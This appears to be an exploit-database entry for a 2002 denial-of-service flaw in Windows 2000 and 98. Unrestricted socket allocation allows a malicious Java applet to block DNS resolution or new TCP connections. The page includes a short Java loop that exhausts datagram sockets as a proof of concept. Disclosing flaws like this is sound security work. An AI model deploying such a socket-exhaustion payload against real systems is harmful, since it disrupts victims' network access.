header-logo
Suggest Exploit
vendor:
Windows 2000 and 98
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Windows 2000 and 98
Affected Version From: Windows 2000 and 98
Affected Version To: Windows 2000 and 98
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Microsoft Windows 2000 and 98 Denial of Service Vulnerability

Microsoft Windows 2000 and 98 are subject to a denial of service condition. Receiving a maliciously crafted email or visiting a malicious web site could prevent Windows 2000 from DNS resolution and Windows 98 from accepting any new TCP connections. This is due to a lack of restrictions on the allocation of network "sockets" by user applications. A malicious java applet placed on a website could exploit this vulnerability and cause a DoS on victim systems.

Mitigation:

Restrict access to the vulnerable system and ensure that all applications are up to date with the latest security patches.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2340/info

Microsoft Windows 2000 and 98 are subject to a denial of service condition. Receiving a maliciously crafted email or visiting a malicious web site could prevent Windows 2000 from DNS resolution and Windows 98 from accepting any new TCP connections. This is due to a lack of restrictions on the allocation of network "sockets" by user applications.

A malicious java applet placed on a website could exploit this vulnerability and cause a DoS on victim systems. 

for(i=0;i<m;i++)
{

try { DatagramSocket d = new DatagramSocket();v.addElement(d);}
catch (Exception e) {System.out.println("Exhausted, i="+i);}
}

Navigation

Suggest Exploit

Services By CQR